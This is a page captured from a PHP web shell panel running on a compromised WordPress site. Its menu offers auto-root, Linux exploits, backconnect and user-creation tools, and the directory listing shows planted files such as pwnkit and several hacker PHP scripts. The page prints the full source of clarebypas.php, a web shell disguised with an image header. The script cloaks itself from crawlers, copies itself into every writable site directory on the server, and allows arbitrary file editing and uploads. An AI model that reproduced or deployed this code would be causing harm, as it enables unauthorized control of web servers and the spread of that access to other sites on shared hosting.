Linux webm002.cluster120.gra.hosting.ovh.net 6.18.42-ovh-vps-grsec-zfs+ #1 SMP PREEMPT_DYNAMIC Wed Aug 5 15:59:48 CEST 2026 x86_64
Apache
: 10.120.20.2 | : 216.73.216.49
Cant Read [ /etc/named.conf ]
8.5.7
verseaumee
Terminal
AUTO ROOT
Adminer
Backdoor Destroyer
Linux Exploit
Lock Shell
Lock File
Create User
CREATE RDP
PHP Mailer
BACKCONNECT
UNLOCK SHELL
HASH IDENTIFIER
README
+ Create Folder
+ Create File
/
home /
verseaumee /
josholurinfr /
[ HOME SHELL ]
Name
Size
Permission
Action
760093
[ DIR ]
drwxr-xr-x
wp-admin
[ DIR ]
drwx---r-x
wp-content
[ DIR ]
drwx---r-x
wp-includes
[ DIR ]
drwx---r-x
.htaccess
523
B
-rw-r--r--
.mad-root
0
B
-rw-r--r--
adminer-4.8.1.php
465.43
KB
-rw-r--r--
clarebypas.php
4.61
KB
-rw-r--r--
index.php
405
B
-rw----r--
license.txt
19.44
KB
-rw-r--r--
mdsdiakk.php
11.1
KB
-rw-r--r--
pwnkit
0
B
-rwxr-xr-x
readme.html
7.23
KB
-rw-r--r--
worksec.php
1.06
KB
-r--r--r--
wp-activate.php
7.54
KB
-rw-r--r--
wp-blog-header.php
351
B
-rw----r--
wp-comments-post.php
2.27
KB
-rw----r--
wp-config-sample.php
3.26
KB
-rw-r--r--
wp-config.php
3.52
KB
-rw----r--
wp-cron.php
5.49
KB
-rw----r--
wp-links-opml.php
2.43
KB
-rw----r--
wp-load.php
3.84
KB
-rw----r--
wp-login.php
51.3
KB
-rw-r--r--
wp-mail.php
8.52
KB
-rw----r--
wp-settings.php
32.38
KB
-rw-r--r--
wp-signup.php
34.26
KB
-rw-r--r--
wp-trackback.php
5.27
KB
-rw----r--
xmlrpc.php
3.13
KB
-rw----r--
Delete
Unzip
Zip
${this.title}
Close
Code Editor : clarebypas.php
�PNG �JFIF������ <?php /*simple Bypass - nyx6st-6ickzone*/ error_reporting(0); if (!empty($_SERVER['HTTP_USER_AGENT'])) { $bots = ['Googlebot', 'Slurp', 'MSNBot', 'PycURL', 'facebookexternalhit', 'ia_archiver', 'crawler', 'Yandex', 'Rambler', 'Yahoo! Slurp', 'YahooSeeker', 'bingbot', 'curl']; if (preg_match('/' . implode('|', $bots) . '/i', $_SERVER['HTTP_USER_AGENT'])) { header('HTTP/1.0 404 Not Found'); exit; } } // === Configuration === $copyName = 'zone.php'; function locateDomainsPath($start) { $dir = realpath($start); while ($dir && $dir !== '/') { if (preg_match('/\/u[0-9a-z]+$/', $dir) && is_dir($dir . '/domains')) { return realpath($dir . '/domains'); } $dir = dirname($dir); } return false; } function deployToDomains($sourceFile, $targetName) { $domainRoot = locateDomainsPath(__DIR__); $deployed = []; if ($domainRoot) { foreach (scandir($domainRoot) as $domain) { if ($domain === '.' || $domain === '..') continue; $htmlPath = "$domainRoot/$domain/public_html"; if (is_dir($htmlPath) && is_writable($htmlPath)) { $targetPath = "$htmlPath/$targetName"; if (@copy($sourceFile, $targetPath)) { $deployed[] = "http://$domain/$targetName"; } } } } return $deployed; } $self = __FILE__; $urls = deployToDomains($self, $copyName); $cwd = isset($_GET['path']) ? realpath($_GET['path']) : getcwd(); if (!$cwd || !is_dir($cwd)) $cwd = getcwd(); echo "<style> body { background:#1a1a1a; color:#ccc; font-family:monospace; padding:20px; } a { color:#6cf; text-decoration:none; } a:hover { text-decoration:underline; } textarea,input[type=text] { width:100%; font-family:monospace; background:#222; color:#fff; border:1px solid #444; } input[type=submit] { background:#333; color:#fff; border:none; padding:5px 10px; } </style>"; echo "<h2>🗂️ simple</h2><p><b>Path:</b> "; $parts = explode('/', trim($cwd, '/')); $build = '/'; foreach ($parts as $part) { $build .= "$part/"; echo "<a href='?path=" . urlencode($build) . "'>$part</a>/"; } echo "</p><hr>"; // === File Editor === if (isset($_GET['edit'])) { $file = realpath($cwd . '/' . basename($_GET['edit'])); if (is_file($file)) { if (isset($_POST['content'])) { file_put_contents($file, $_POST['content']); echo "<p style='color:#0f0'>✅ Saved</p>"; } $code = htmlspecialchars(file_get_contents($file)); echo "<h3>✏️ Editing: " . basename($file) . "</h3> <form method='post'> <textarea name='content' rows='20'>$code</textarea><br> <input type='submit' value='Save'> </form> <p><a href='?path=" . urlencode($cwd) . "'>🔙 Back</a></p>"; exit; } } // === Upload Handler === if (!empty($_FILES['upload']['name'])) { $target = $cwd . '/' . basename($_FILES['upload']['name']); move_uploaded_file($_FILES['upload']['tmp_name'], $target); echo "<p style='color:#0f0'>📤 Uploaded: " . htmlspecialchars($_FILES['upload']['name']) . "</p>"; } // === Folder Creation === if (!empty($_POST['newdir'])) { $newFolder = $cwd . '/' . basename($_POST['newdir']); if (!file_exists($newFolder)) { mkdir($newFolder); echo "<p style='color:#0f0'>📁 Folder created</p>"; } else { echo "<p style='color:#f66'>❌ Folder already exists</p>"; } } // === List Directory === echo "<ul>"; foreach (scandir($cwd) as $item) { if ($item === '.') continue; $full = $cwd . '/' . $item; $encodedPath = urlencode($cwd); if (is_dir($full)) { echo "<li>📁 <a href='?path=" . urlencode($full) . "'>" . htmlspecialchars($item) . "</a></li>"; } else { echo "<li>📄 <a href='?path=$encodedPath&edit=" . urlencode($item) . "'>" . htmlspecialchars($item) . "</a></li>"; } } echo "</ul><hr>"; // === Upload Form === echo "<form method='post' enctype='multipart/form-data'> <label>📤 Upload File:</label><br> <input type='file' name='upload'><br> <input type='submit' value='Upload'> </form>"; // === Create Folder Form === echo "<form method='post'> <label>📁 New Folder:</label><br> <input type='text' name='newdir'><br> <input type='submit' value='Create'> </form>"; ?> <!-- image binary tail --> ����nTJnLK��@!�-����m�
Close